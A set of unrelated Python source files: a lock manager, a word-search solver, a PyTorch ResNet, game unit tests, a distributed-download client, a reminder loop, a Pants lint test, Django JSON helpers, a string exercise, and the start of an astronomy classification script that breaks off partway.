self.KeytoLocks[Key].sLocks += 1
self.KeytoLocks[Key].inUseBy.append(transactionID)
# already has lock
return True
if self.KeytoLocks[Key].isShrinking:
# cannot give lock when lock is shrinking
return False
# if there is not an xLock
if self.KeytoLocks[Key].xLocks == 0:
if transactionID not in self.KeytoLocks[Key].inUseBy:
self.KeytoLocks[Key].inUseBy.append(transactionID)
self.KeytoLocks[Key].sLocks += 1
giveLock = True
# if there is an xLock
elif self.KeytoLocks[Key].xLocks == 1:
if transactionID in self.KeytoLocks[Key].inUseBy:
self.KeytoLocks[Key].sLocks += 1
giveLock = True
return giveLock
# return false if X or S lock already present
def obtainXLock(self, Key, transactionID):
giveLock = False
if Key not in self.KeytoLocks:
self.KeytoLocks[Key] = RecordLock()
self.KeytoLocks[Key].xLocks = 1
self.KeytoLocks[Key].inUseBy.append(transactionID)
return True
if self.KeytoLocks[Key].isShrinking:
# cannot give lock when lock is shrinking
return False
#if there are no X locks
if self.KeytoLocks[Key].xLocks == 0:
            # and no S locks, give out lock
if self.KeytoLocks[Key].sLocks == 0:
self.KeytoLocks[Key].xLocks = 1
self.KeytoLocks[Key].inUseBy.append(transactionID)
giveLock = True
# and there is an s Lock, then check what's using lock
elif self.KeytoLocks[Key].sLocks == 1:
if transactionID in self.KeytoLocks[Key].inUseBy:
self.KeytoLocks[Key].xLocks = 1
self.KeytoLocks[Key].inUseBy.append(transactionID)
giveLock = True
# if there is an x lock already then any s locks are from the same transaction
elif self.KeytoLocks[Key].xLocks == 1:
if transactionID in self.KeytoLocks[Key].inUseBy:
giveLock = True
return giveLock
# Initiate shrinking phase
# If num S locks == 0, set shrinkingPhase to false
def giveUpSLock(self, Key, transactionID):
removeLock = False
if Key not in self.KeytoLocks:
return True
if (self.KeytoLocks[Key].sLocks > 0):
self.KeytoLocks[Key].isShrinking = True
if transactionID in self.KeytoLocks[Key].inUseBy:
self.KeytoLocks[Key].inUseBy.remove(transactionID)
self.KeytoLocks[Key].sLocks = self.KeytoLocks[Key].sLocks - 1
if (self.KeytoLocks[Key].sLocks == 0):
self.KeytoLocks[Key].isShrinking = False
removeLock = True
return removeLock
def giveUpXLock(self, Key, transactionID):
removeLock = False
if Key not in self.KeytoLocks:
return True
if (self.KeytoLocks[Key].xLocks == 1):
if transactionID in self.KeytoLocks[Key].inUseBy:
self.KeytoLocks[Key].inUseBy.remove(transactionID)
self.KeytoLocks[Key].xLocks = 0
removeLock = True
return removeLock
global LM
LM = LockManager()
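# --- Usage sketch (not part of the original module) ---
# Two-phase locking with the global LockManager above, illustrative only:
#
# tid = LM.getTransactionID()
# assert LM.obtainSLock('some_key', tid)   # shared lock for reads
# assert LM.obtainXLock('some_key', tid)   # the same transaction may upgrade
# LM.giveUpXLock('some_key', tid)
# LM.giveUpSLock('some_key', tid)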
|
# File: proj2.py
# Author: Joel Okpara
# Date: 5/9/16
# Section: 04
# E-mail: joelo1@umbc.edu
# Description: Finds words on a word search using the puzzle and word list given
REFERENCE = [-1,0,1] #values used in a dictionary reference system
#inputVal() validates that the user is inputting a .txt file
#Input: A file chosen by the user
#Output: Whether or not it's a .txt file
def inputVal(aFile):
if (aFile[-4:] != ".txt"):
return False
else:
return True
#printFile() prints the contents of the file given to the screen
#This function is mainly just to let the user see the puzzle and word list
#Input: A file
#Output: Contents printed to screen
def printFile(aFile):
for l in aFile:
print(l.strip())
#make2D() makes the unseen 2D list that we will search through for words
#Input: The puzzle file chosen by the user
#Output: a 2D list of the puzzle
def make2D(aFile):
aList = []
for l in aFile:
aList.append(l.strip().split())
return aList
#findWord() finds the first letter of the word in the puzzle grid
#then searches in every direction in order to find the rest of the word
#Input: The word, the puzzle grid, the current row and column, and the row and column directions to look in
#Output: Whether or not the whole word is found
def findWord(word, list2D, row, col, rowDir, colDir):
#would normally be len(word) == 0, but I never stripped the whitespace so len(word) will never be 0
if (len(word) == 1):
return True
#Makes sure that the "cursor" stays within the grids boundaries
if (row < 0 or row > len(list2D) - 1) or (col < 0 or col > len(list2D[row]) - 1):
return False
#If the first letter of given word is in the 2d list
if (word[0] == list2D[row][col]):
#call the function again starting at the next letter, add the direction numbers in order to search in
#all 8 directions
return findWord(word[1:], list2D, row + rowDir, col + colDir, rowDir, colDir)
return False
#directionCheck() figures out which direction the word went in based on what numbers we added or
#subtracted to the rows and columns in order to find the word
#Input: the word and 2D list
#Output: Whether the word was found, the key to the direction dictionary, and the row/column coordinates
def directionCheck(word, list2D):
for r in range(0,len(list2D)): #for each row coordinate
for c in range(0,len(list2D[r])): #for each column coordinate
for clmDir in REFERENCE: #for each column direction(left a column, stay in same column ,right a column)
for rwDir in REFERENCE: #for each row direction(up a row, stay in same row, down a row)
if findWord(word, list2D, r, c, rwDir, clmDir) == True: #if we found the word
#put the numbers we used to find the word together to make the keys for a dictionary
dirKey = "{row}{col}".format(row = rwDir, col = clmDir)
                        #return (wordFound, key for the dictionary, row/column coordinates)
return True, dirKey, r, c
else:
return False, None, None, None
def main():
#Input the puzzle you want to find from
puzzInput = input("What puzzlefile would you like to use? ")
while inputVal(puzzInput) != True:
puzzInput = input("invalid file name, try again: ")
#Input the word list that you want to find
wordInput = input("What word list file would you like to use? ")
while inputVal(wordInput) != True:
wordInput = input("invalid file name, try again: ")
#File I/O
puzzFile = open(puzzInput)
wordFile = open(wordInput)
puzzList = puzzFile.readlines()
wordList = wordFile.readlines()
#Print puzzle and word list to screen
print("\nHere is the word search")
printFile(puzzList)
print()
print("Here is the word list")
printFile(wordList)
print()
# assign 2D list to puzz2D
puzz2D = make2D(puzzList)
#dictionary for directional phrases
wordDirections = {"-1-1": "Diagonally Up and Left", "-10":"Up", "-11": "Diagonally Up and Right", "0-1":"Backwards and Left", "01": "Right", "1-1": "Diagonally Down and Left", "10": "Down", "11": "Diagonally Down and Right"}
#################### DICTIONARY LOGIC ####################################################################
#look up a row = -1
#same row = 0
#look down a row = 1
#look left a column = -1
#same column = 0
#look right a column = 1
# So for example if I found a word by adding -1 to the row coordinates and -1 to the column coordinates
# that means the word was going Diagonally Up and Left
#######################################################################################################
for string in wordList: #for each word in my list of words
#assigning the values that I returned from directionCheck() to these variables
wordFound, direction, r, c = directionCheck(string,puzz2D)
if wordFound == True:
print("The word", string.strip(), "starts in", r, ",",c, "and goes", wordDirections[direction])
else:
print("The word", string.strip(), "does not appear in this puzzle")
main()
|
import functools
import torch
import torch.nn as nn
import torch.optim
from torch.nn import init
from torch.optim import lr_scheduler
def conv3x3(inplanes, outplanes, stride=1):
return nn.Conv2d(inplanes, outplanes, kernel_size=3, stride=stride,
padding=1, bias=False)
def get_norm_layer(layer_type='batch'):
if layer_type == 'batch':
norm_layer = functools.partial(nn.BatchNorm2d, affine=True)
elif layer_type == 'instance':
norm_layer = functools.partial(nn.InstanceNorm2d, affine=False)
elif layer_type == 'none':
norm_layer = None
else:
raise NotImplementedError(
'normalization layer [%s] is not found' % layer_type)
return norm_layer
def get_non_linearity(layer_type='relu'):
if layer_type == 'relu':
nl_layer = functools.partial(nn.ReLU, inplace=True)
elif layer_type == 'lrelu':
nl_layer = functools.partial(
nn.LeakyReLU, negative_slope=0.2, inplace=True)
elif layer_type == 'elu':
nl_layer = functools.partial(nn.ELU, inplace=True)
else:
raise NotImplementedError(
'nonlinearity activitation [%s] is not found' % layer_type)
return nl_layer
# Basic block
class BasicBlock(nn.Module):
def __init__(self, inplanes, outplanes, norm_layer=None, nl_layer=None, s=1):
super(BasicBlock, self).__init__()
layers = []
# self.maxPool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
if s == 1:
layers += [conv3x3(inplanes, inplanes)]
if norm_layer is not None:
layers += [norm_layer(inplanes)]
layers += [nl_layer()]
layers += [conv3x3(inplanes, outplanes)]
if norm_layer is not None:
layers += [norm_layer(outplanes)]
layers += [nl_layer()]
self.shortcut = nn.Conv2d(inplanes, outplanes, kernel_size=1, stride=1, padding=0)
elif s == 2:
layers += [conv3x3(inplanes, inplanes)]
if norm_layer is not None:
layers += [norm_layer(inplanes)]
layers += [nl_layer()]
layers += [conv3x3(inplanes, outplanes, stride=2)]
if norm_layer is not None:
layers += [norm_layer(outplanes)]
layers += [nl_layer()]
self.shortcut = nn.Conv2d(inplanes, outplanes, kernel_size=1, stride=2, padding=0)
else:
assert 0
self.conv = nn.Sequential(*layers)
def forward(self, x):
x0 = self.conv(x)
out = x0 + self.shortcut(x)
return out
class Resnet(nn.Module):
def __init__(self, input_nc, num_classes=10, ndf=64, n_blocks=4, norm='batch',
nl='lrelu'):
super(Resnet, self).__init__()
norm_layer = get_norm_layer(norm)
nl_layer = get_non_linearity(nl)
conv_layers = [nn.Conv2d(input_nc, ndf, kernel_size=7, stride=2, padding=3, bias=False)]
conv_layers += [norm_layer(ndf), nl_layer()]
conv_layers += [nn.MaxPool2d(kernel_size=3, stride=2, padding=1)]
output_ndf = 0
for n in range(0, n_blocks):
input_ndf = ndf * (2 ** max(0, n - 1))
output_ndf = ndf * (2 ** n)
if n == 0:
conv_layers += [BasicBlock(input_ndf, output_ndf, norm_layer, nl_layer, s=1)]
else:
conv_layers += [BasicBlock(input_ndf, output_ndf, norm_layer, nl_layer, s=2)]
conv_layers += [nn.AdaptiveAvgPool2d((1, 1))]
self.conv = nn.Sequential(*conv_layers)
self.fc = nn.Linear(output_ndf, num_classes)
def forward(self, x):
x_conv = self.conv(x)
x_flat = torch.flatten(x_conv, 1)
out = self.fc(x_flat)
        output = nn.Softmax(dim=1)(out)
return output
class ExtractFirstLayer(nn.Module):
    # only defined up to the first convolution layer
def __init__(self, input_nc, num_classes=10, ndf=64, n_blocks=4, norm='batch',
nl='lrelu'):
super(ExtractFirstLayer, self).__init__()
self.conv1 = nn.Conv2d(input_nc, ndf, kernel_size=7, stride=2, padding=3, bias=False)
def forward(self, x):
x_conv1 = self.conv1(x)
return x_conv1
class ExtractLastLayer(nn.Module):
"""
    Defined up to the last convolution layer; outputs the feature map
"""
def __init__(self, input_nc, num_classes=10, ndf=64, n_blocks=4, norm='batch',
nl='lrelu'):
super(ExtractLastLayer, self).__init__()
norm_layer = get_norm_layer(norm)
nl_layer = get_non_linearity(nl)
conv_layers = [nn.Conv2d(input_nc, ndf, kernel_size=7, stride=2, padding=3, bias=False)]
conv_layers += [norm_layer(ndf), nl_layer()]
conv_layers += [nn.MaxPool2d(kernel_size=3, stride=2, padding=1)]
max_pool = [nn.Conv2d(input_nc, ndf, kernel_size=7, stride=2, padding=3, bias=False),
norm_layer(ndf), nl_layer(),
nn.MaxPool2d(kernel_size=3, stride=2, padding=1,
return_indices=True)]
self.max_pool = nn.Sequential(*max_pool)
for n in range(0, n_blocks):
input_ndf = ndf * (2 ** max(0, n - 1))
output_ndf = ndf * (2 ** n)
if n == 0:
conv_layers += [BasicBlock(input_ndf, output_ndf, norm_layer, nl_layer, s=1)]
else:
conv_layers += [BasicBlock(input_ndf, output_ndf, norm_layer, nl_layer, s=2)]
self.conv = nn.Sequential(*conv_layers)
def forward(self, x):
x_conv = self.conv(x)
_, indices = self.max_pool(x)
return x_conv, indices
def init_net(net, init_type='normal', gpu_ids=[0], gain=0.02):
if len(gpu_ids) > 0:
assert (torch.cuda.is_available())
device = torch.device('cuda:0')
net.to(device)
def init_func(m):
classname = m.__class__.__name__
if hasattr(m, 'weight') and (classname.find('Conv') != -1 or
classname.find('Linear') != -1):
if init_type == 'normal':
init.normal_(m.weight.data, 0.0, gain)
elif init_type == 'xavier':
init.xavier_normal_(m.weight.data, gain=gain)
elif init_type == 'kaiming':
init.kaiming_normal_(m.weight.data, a=0, mode='fan_in')
elif init_type == 'orthogonal':
init.orthogonal_(m.weight.data, gain=gain)
else:
raise NotImplementedError('initialization method [%s] is not implemented' % init_type)
if hasattr(m, 'bias') and m.bias is not None:
init.constant_(m.bias.data, 0.0)
elif classname.find('BatchNorm2d') != -1:
init.normal_(m.weight.data, 1.0, gain)
init.constant_(m.bias.data, 0.0)
print('initialize network with %s' % init_type)
net.apply(init_func)
return net
def get_scheduler(optimizer, opt):
if opt.lr_policy == 'lambda':
def lambda_rule(epoch):
lr_l = 1.0 - max(0, epoch - opt.niter) / float(opt.niter_decay + 1)
return lr_l
scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lambda_rule)
elif opt.lr_policy == 'step':
scheduler = lr_scheduler.StepLR(
optimizer, step_size=opt.lr_decay_iters, gamma=0.1)
elif opt.lr_policy == 'plateau':
scheduler = lr_scheduler.ReduceLROnPlateau(
optimizer, mode='min', factor=0.2, threshold=0.01, patience=5)
else:
return NotImplementedError('learning rate policy [%s] is not implemented', opt.lr_policy)
return scheduler
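# --- Minimal sanity-check sketch (not part of the original file) ---
# Builds the classifier on CPU and runs a dummy batch through it.
if __name__ == '__main__':
    model = Resnet(input_nc=3, num_classes=10)
    dummy = torch.randn(2, 3, 224, 224)
    probs = model(dummy)
    print(probs.shape)  # (2, 10); rows sum to ~1 because of the softmax head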
|
'''
Created on 7 feb. 2014
@author: Pieter
'''
import unittest
from dungeonz.CageBoard import CageBoard
from dungeonz.Cage import Cage, Upgrade
from dungeonz.Petz import Pet
class Test(unittest.TestCase):
def setUp(self):
self.cb1 = CageBoard(1)
self.cb2 = CageBoard(2)
self.cb3 = CageBoard(3)
self.cb4 = CageBoard(4)
self.tc1 = Cage("cage_1.png",strength=2,magic=1)
self.tc2 = Cage("cage_6.png",magic=3)
self.tu=Upgrade("upgrade_1.png", "strength")
self.tp=Pet("1",eating="veg",sell_value={4:2,5:3,6:4,7:5})
def tearDown(self):
del(self.cb1)
del(self.cb2)
del(self.cb3)
del(self.cb4)
del(self.tc1)
del(self.tc2)
del(self.tu)
del(self.tp)
def testConstructor(self):
self.assertIsInstance(self.cb1, CageBoard)
self.assertIsInstance(self.cb1.cages, list)
self.assertIsInstance(self.cb1.cages[0], Cage)
self.assertEqual(self.cb1.cages[1], None)
self.assertEqual(self.cb1.cages[2], None)
self.assertEqual(self.cb1.cages[3], None)
self.assertIsInstance(self.cb1.cage_upgrades, list)
self.assertEqual(self.cb1.cage_upgrades, [None,None,None,None])
self.assertIsInstance(self.cb1.petz, list)
self.assertEqual(self.cb1.petz, [None,None,None,None])
self.assertIsInstance(self.cb1.free, list)
self.assertEqual(self.cb1.free, [1,1,1,1])
self.assertEqual(self.cb1.cages[0].getAttributes()['poo'], 1)
self.assertIsInstance(self.cb2, CageBoard)
self.assertIsInstance(self.cb2.cages, list)
self.assertIsInstance(self.cb2.cages[0], Cage)
self.assertEqual(self.cb2.cages[1], None)
self.assertEqual(self.cb2.cages[2], None)
self.assertEqual(self.cb2.cages[3], None)
self.assertIsInstance(self.cb2.cage_upgrades, list)
self.assertEqual(self.cb2.cage_upgrades, [None,None,None,None])
self.assertIsInstance(self.cb2.petz, list)
self.assertEqual(self.cb2.petz, [None,None,None,None])
self.assertIsInstance(self.cb2.free, list)
self.assertEqual(self.cb2.free, [1,1,1,1])
self.assertEqual(self.cb2.cages[0].getAttributes()['poo'], 1)
self.assertIsInstance(self.cb3, CageBoard)
self.assertIsInstance(self.cb3.cages, list)
self.assertIsInstance(self.cb3.cages[0], Cage)
self.assertEqual(self.cb3.cages[1], None)
self.assertEqual(self.cb3.cages[2], None)
self.assertEqual(self.cb3.cages[3], None)
self.assertIsInstance(self.cb3.cage_upgrades, list)
self.assertEqual(self.cb3.cage_upgrades, [None,None,None,None])
self.assertIsInstance(self.cb3.petz, list)
self.assertEqual(self.cb3.petz, [None,None,None,None])
self.assertIsInstance(self.cb3.free, list)
self.assertEqual(self.cb3.free, [1,1,1,1])
self.assertEqual(self.cb3.cages[0].getAttributes()['poo'], 1)
self.assertIsInstance(self.cb4, CageBoard)
self.assertIsInstance(self.cb4.cages, list)
self.assertIsInstance(self.cb4.cages[0], Cage)
self.assertEqual(self.cb4.cages[1], None)
self.assertEqual(self.cb4.cages[2], None)
self.assertEqual(self.cb4.cages[3], None)
self.assertIsInstance(self.cb4.cage_upgrades, list)
self.assertEqual(self.cb4.cage_upgrades, [None,None,None,None])
self.assertIsInstance(self.cb4.petz, list)
self.assertEqual(self.cb4.petz, [None,None,None,None])
self.assertIsInstance(self.cb4.free, list)
self.assertEqual(self.cb4.free, [1,1,1,1])
self.assertEqual(self.cb4.cages[0].getAttributes()['poo'], 1)
def testAddCage(self):
self.assertIsInstance(self.cb1.cages[0], Cage)
self.assertEqual(self.cb1.free, [True for x in range(4)]) # @UnusedVariable
self.assertFalse(self.cb1.addCage(1, " tralala"))
self.assertFalse(self.cb1.addCage(6, self.tc1))
self.assertTrue(self.cb1.addCage(1, self.tc1))
self.assertEqual(self.cb1.free, [False,True,True,True])
self.assertEqual(self.cb1.cages[0], self.tc1)
self.assertFalse(self.cb1.addCage(1, self.tc2))
self.assertEqual(self.cb1.cages[0], self.tc1)
def testGetAttributes(self):
self.assertIsInstance(self.cb1.getAttributes(),dict)
aa=self.cb1.getAttributes()
self.assertIsInstance(aa['cages'], list)
self.assertIsInstance(aa['cage_upgrades'], list)
self.assertIsInstance(aa['petz'], list)
self.assertIsInstance(aa['free'], list)
self.assertEqual(len(aa['cages']), 4)
self.assertEqual(len(aa['cage_upgrades']), 4)
self.assertEqual(len(aa['petz']), 4)
self.assertEqual(len(aa['free']), 4)
self.assertFalse(self.cb1.getAttributes(5))
self.assertIsInstance(self.cb1.getAttributes(3),dict)
self.cb1.addCage(2, self.tc1)
self.cb1.cage_upgrades[1] = self.tu
self.cb1.petz[1] = self.tp
s2= self.cb1.getAttributes(2)
self.assertEqual(s2['cage'], self.tc1)
self.assertEqual(s2['cage_upgrade'], self.tu)
self.assertEqual(s2['pet'], self.tp)
self.assertFalse(s2['free'])
def testAddPetToCage(self):
self.cb1.addCage(2, self.tc1)
self.assertEqual(self.cb1.getAttributes(2)['pet'], None)
self.assertFalse(self.cb1.addPetToCage(5, self.tp))
self.assertFalse(self.cb1.addPetToCage(4, self.tp))
self.assertTrue(self.cb1.addPetToCage(2, self.tp))
self.assertFalse(self.cb1.addPetToCage(3, "tralala"))
self.assertEqual(self.cb1.getAttributes(2)['pet'], self.tp)
self.assertEqual(self.tp.getCage(), self.tc1)
self.assertFalse(self.cb1.addPetToCage(2, self.tp))
def testAddUpgrade(self):
self.assertEqual(self.tc1.strength, 2)
self.assertFalse(self.cb1.addUpgrade(5, self.tu))
self.assertFalse(self.cb1.addUpgrade(1, "trat"))
self.assertFalse(self.cb1.addUpgrade(3, self.tu))
self.assertTrue(self.cb1.addCage(2, self.tc1))
self.assertTrue(self.cb1.addUpgrade(2, self.tu))
self.assertEqual(self.tc1.strength, 3)
self.assertFalse(self.cb1.addUpgrade(2, self.tu))
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
import socket, os, sys
import time
import download_dhaga
#To get ip of current node
x=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
try:
x.connect(("gmail.com",80))
myip=x.getsockname()[0]
except:
print "Client not connected to internet !!!!!"
return
#UDP part
clientSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
clientSocket.bind((myip,50008))
msg,serveraddr=clientSocket.recvfrom(2048)
serverip=serveraddr[0]
msg,totno=msg.split('#') #totno represents total no of nodes on network
print msg
totno=int(totno)
res=raw_input("Enter Yes/No\n")
clientSocket.sendto(res,serveraddr)
clientSocket.close()
if(res == "Yes"):
#To set client address and port
#serveraddr=(myip,50005) #myip to be replace with server addr
time.sleep(9*totno)
print "Client on TCP"
clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clientSocket.connect((serverip,50005))
ext=clientSocket.recv(1024)
msg=clientSocket.recv(1024)
#print msg
rurl,st,en,i=msg.split()
start=int(st)
end=int(en)
ind=int(i)
download_dhaga.download(rurl,start,end,ext)
f=open('final'+ext,'rb')
l=f.read(1024)
while l:
clientSocket.send(l)
l=f.read(1024)
os.remove('final'+ext)
clientSocket.close()
|
from datetime import datetime, time
from time import sleep
from GUI import *
import Main
from tkinter import messagebox
runGUI()
while (True):
hour = datetime.now().hour
min = datetime.now().minute
day = datetime.now().weekday()
if len(Main.toDoList[day]) == 0:
sleep((24 - hour)*60*60 +(60 - min)*60)
else :
works_list = Main.toDoList[day]
for i in range(len(works_list)):
work = works_list[i]
if time(hour, min) > work.getTime():
continue
else:
t = datetime.now().time()
while not(t.hour == work.getTime().hour and t.minute == work.getTime().minute):
sleep(30)
t = datetime.now().time()
mess = work.toString() + (' -> Mother' if Main.mark[day][i] else ' -> Father')
notice(mess)
|
# Copyright 2023 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from textwrap import dedent
import pytest
from pants.backend.visibility.lint import EnforceVisibilityRules, VisibilityFieldSet
from pants.backend.visibility.lint import rules as lint_rules
from pants.backend.visibility.rules import rules as visibility_rules
from pants.core.goals.lint import Lint, LintResult
from pants.core.target_types import GenericTarget
from pants.core.util_rules.partitions import _EmptyMetadata
from pants.engine.addresses import Address
from pants.engine.target import Target
from pants.testutil.rule_runner import QueryRule, RuleRunner
@pytest.fixture
def rule_runner() -> RuleRunner:
rule_runner = RuleRunner(
rules=[
*lint_rules(),
*visibility_rules(),
QueryRule(LintResult, (EnforceVisibilityRules.Batch,)),
],
target_types=[GenericTarget],
)
rule_runner.write_files(
{
"BUILD": dedent(
"""\
__dependencies_rules__(
# No dependencies at all allowed
("*", "!*"),
)
target(name="root")
target(name="leaf", dependencies=["//:root"])
"""
),
}
)
return rule_runner
def run_lint(
rule_runner: RuleRunner,
targets: list[Target],
*,
extra_args: list[str] | None = None,
) -> LintResult:
rule_runner.set_options(
["--backend-packages=pants.backend.experimental.visibilty", *(extra_args or ())],
)
field_sets = [VisibilityFieldSet.create(tgt) for tgt in targets]
with rule_runner.scheduler._goals._execute(Lint):
lint_result = rule_runner.request(
LintResult,
[
EnforceVisibilityRules.Batch(
"",
tuple(field_sets),
partition_metadata=_EmptyMetadata(),
),
],
)
return lint_result
def test_lint_success(rule_runner: RuleRunner) -> None:
tgt = rule_runner.get_target(Address("", target_name="root"))
lint_result = run_lint(
rule_runner,
[tgt],
)
assert lint_result.exit_code == 0
assert lint_result.stderr == ""
assert lint_result.stdout == ""
def test_lint_failure(rule_runner: RuleRunner) -> None:
tgt = rule_runner.get_target(Address("", target_name="leaf"))
lint_result = run_lint(
rule_runner,
[tgt],
)
assert lint_result.exit_code == 1
assert lint_result.stderr == ""
assert (
lint_result.stdout
== dedent(
"""\
//:leaf has 1 dependency violation:
* BUILD[!*] -> : DENY
target //:leaf -> target //:root
"""
).strip()
)
|
"""Utility functions to handle the backpropagation."""
def no_op(*args, **kwargs):
"""Placeholder function that accepts arbitrary input and does nothing."""
return None
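# Illustrative sketch (not part of the original module): no_op works as a default
# callback, so callers can invoke a hook unconditionally instead of checking for None.
def run_with_hook(value, on_done=no_op):
    """Hypothetical helper: doubles a value and always calls on_done on the result."""
    result = value * 2
    on_done(result)
    return result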
|
import json
from django.http import HttpResponse
def ajax_error(etype='DefaultError', description='Internal server error',
               additional_data=None):
    msg = {
        'reason': etype,
        'data': description
    }
    msg.update(additional_data or {})
return HttpResponse(
json.dumps({
'status' : 'fail',
'msg': msg
})
)
def ajax_confirm(data=None):
    return HttpResponse(
        json.dumps({
            'status': 'ok',
            'msg': data if data is not None else {}
        })
    )
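# Illustrative usage sketch (the view below is hypothetical and not part of the project):
# wrapping a lookup so the client always receives the same JSON envelope.
def example_detail_view(request, item_id):
    try:
        item = {'id': item_id}  # stand-in for a real model query
        return ajax_confirm(item)
    except KeyError as exc:
        return ajax_error('LookupError', str(exc))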
|
def remove(text, what):
    result = ''
    for x in text:
        if x in what and what[x] > 0:
            what[x] -= 1
        else:
            result += x
    return result
'''
Write
remove(text, what)
that takes in a string str(text in Python) and an object/hash/dict/Dictionary
what and returns a string with the chars removed in what. For example:
remove('this is a string',{'t':1, 'i':2}) == 'hs s a string'
# remove from 'this is a string' the first 1 't' and the first 2 i's.
remove('hello world',{'x':5, 'i':2}) == 'hello world'
# there are no x's or i's, so nothing gets removed
remove('apples and bananas',{'a':50, 'n':1}) == 'pples d bnns'
# we don't have 50 a's, so just remove it till we hit end of string.
'''
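# Quick checks taken directly from the examples in the docstring above.
assert remove('this is a string', {'t': 1, 'i': 2}) == 'hs s a string'
assert remove('hello world', {'x': 5, 'i': 2}) == 'hello world'
assert remove('apples and bananas', {'a': 50, 'n': 1}) == 'pples d bnns'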
|
"""
Small module with functionality to predict the classification of objects into stars, quasars, and galaxies.
"""
import argparse
import json
import joblib
import functools
import glob
import importlib
import os
import multiprocessing
import pickle
import re
import shutil
#import subprocess
import sys
import time
from collections import defaultdict
import astropy.table
import numpy as np
import pandas as pd
import tqdm
import warnings
def _import_user_defined_features_transformation(
path_to_code: str,
transformation_name: str):
path, module_name = os.path.split(os.path.splitext(path_to_code)[0])
sys.path.append(path)
user_module = importlib.import_module(module_name)
return getattr(user_module, transformation_name)
def _columns_intersection(df1: pd.DataFrame, df2: pd.DataFrame):
result = list()
for col in df1.columns:
if col in df2.columns:
result.append(col)
return result
def format_message(msg):
return f'===== {msg} ====='
def file_exists(path):
return os.path.isfile(path) and os.stat(path).st_size > 0
def parse_cli_args():
def check_args(args):
return True
def _add_default_and_type(desc: str, arg_type=None, default_value=None,
isflag=False):
"""
Helper function to form an argument description for argparse
:param desc: helper description
:param arg_type: argument type to insert to argument description
:param default_value: default value of arg_type to insert to argument description
:param isflag: if True, then adds info that the argument is a flag
:return: argument description with type and default value information if such provided
"""
assert arg_type is None or callable(arg_type)
assert default_value is None or isinstance(default_value, arg_type)
if isflag:
default_value_msg = ''
arg_type_msg = 'flag'
else:
arg_type_msg = ''
if arg_type is not None:
arg_type_msg = f'type: {type(arg_type()).__name__}'
default_value_msg = ''
if default_value is not None:
if arg_type == str:
default_value_msg = f'default: "{default_value}"'
else:
default_value_msg = f'default: {default_value}'
if default_value_msg and arg_type_msg:
return f'[{arg_type_msg}; {default_value_msg}] {desc}'
if arg_type_msg:
return f'[{arg_type_msg}] {desc}'
if default_value_msg:
return f'[{default_value_msg}] {desc}'
return desc
description = "Script to make сlassification of objects into stars, quasars and galaxy for objects with photometric data."\
"\n" \
"\n List of models" \
"\n " \
"\n - gb - Gradient boosting models" \
"\n - tn - TabNet models" \
"\n - gb_big - Gradient boosting models trained on a large dataset" \
"\n - tn_big - TabNet models trained on a large dataset" \
"\n - 18 - SDSS + WISE" \
"\n - 19 - PanSTARRS + WISE" \
"\n - 20 - SDSS + DESI LIS + WISE" \
"\n - 21 - PanSTARRS + DESI LIS + WISE" \
"\n - 22 - DESI LIS + WISE" \
"\n - 34 - SDSS + PanSTARRS + WISE" \
"\n - 35 - SDSS + PanSTARRS + DESI LIS + WISE"
parser = argparse.ArgumentParser(
formatter_class=argparse.RawTextHelpFormatter,
description=description)
argument_description = "Path to input file."
arg_type = str
default_value = './x-ray_data.gz_pkl'
parser.add_argument('--inputFile', type=arg_type,
help=_add_default_and_type(argument_description,
arg_type, default_value))
argument_description = "Path to dir with features files to make predictions on."
arg_type = str
default_value = None
parser.add_argument('--predictOn', type=arg_type, default=default_value,
help=_add_default_and_type(argument_description,
arg_type, default_value))
argument_description = "Format of output file."
arg_type = str
default_value = 'gz_pkl'
parser.add_argument('--outputExt', type=arg_type,
help=_add_default_and_type(argument_description,
arg_type, default_value))
# other arguments
argument_description = "Path to output directory."
arg_type = str
default_value = None
parser.add_argument('-o', '--outputDir', type=arg_type,
help=_add_default_and_type(argument_description,
arg_type, default_value))
argument_description = "Models series to apply. Possible values are 'gb', 'tn'."
arg_type = str
default_value = "gb"
parser.add_argument('--modelsSeries', type=arg_type, default=default_value,
help=_add_default_and_type(argument_description,
arg_type, default_value))
argument_description = "Specify list of models' ids to apply. If not specified, then will apply default" \
" set of models for specified series. See list of models above."
arg_type = int
default_value = None
parser.add_argument('--modelsIds', type=arg_type, default=default_value,
nargs='+',
help=_add_default_and_type(argument_description,
arg_type, default_value))
argument_description = "If used then all models will be loaded into memory at once"
parser.add_argument('--keepModelsInMemory', action='store_true',
help=_add_default_and_type(argument_description,
isflag=True))
argument_description = "Predictions chunk size. Ignored if --predictOn"
arg_type = int
default_value = 100000
parser.add_argument('--chunkSize', type=arg_type, default=default_value,
help=_add_default_and_type(argument_description,
arg_type, default_value))
argument_description = "Number of jobs for parallelism"
arg_type = int
default_value = 1
parser.add_argument('--njobs', type=arg_type, default=default_value,
help=_add_default_and_type(argument_description,
arg_type, default_value))
return parser.parse_args()
def _drop_multidims(table: astropy.table.Table):
"""
    Drop multidimensional columns from an astropy.table.Table so that it can be converted to a pandas.DataFrame.
"""
singledim_cols = list()
multidim_cols = list()
for col in table.colnames:
if len(table[col].shape) == 1:
singledim_cols.append(col)
else:
multidim_cols.append(col)
return table[singledim_cols], multidim_cols
def read_table(table):
if isinstance(table, str):
_, ext = os.path.splitext(table)
if ext == '.gz_pkl':
try:
return pd.read_pickle(table, compression='gzip')
except:
return pd.read_pickle(table)
if ext == '.pkl':
return pd.read_pickle(table)
if ext == '.fits':
table = astropy.table.Table.read(table)
if isinstance(table, pd.DataFrame):
return table
if isinstance(table, astropy.table.Table):
table, dropped_cols = _drop_multidims(table)
if dropped_cols:
warnings.warn(
"multidimentional columns are dropped from table : {}".format(
dropped_cols))
return table.to_pandas()
raise Exception('Unsupported format of table')
def write_table(table, df):
if not isinstance(df, pd.DataFrame):
raise Exception('DataFrame is not pandas')
if isinstance(table, str):
_, ext = os.path.splitext(table)
if ext == '.gz_pkl':
df.to_pickle(table, compression='gzip', protocol=4)
return
if ext == '.pkl':
df.to_pickle(table)
return
if ext == '.fits':
#print(df.fillna(-9999).dtypes)
df['index'] = df.index.copy()
df = astropy.table.Table.from_pandas(df.fillna(-9999))#.dropna()
'''
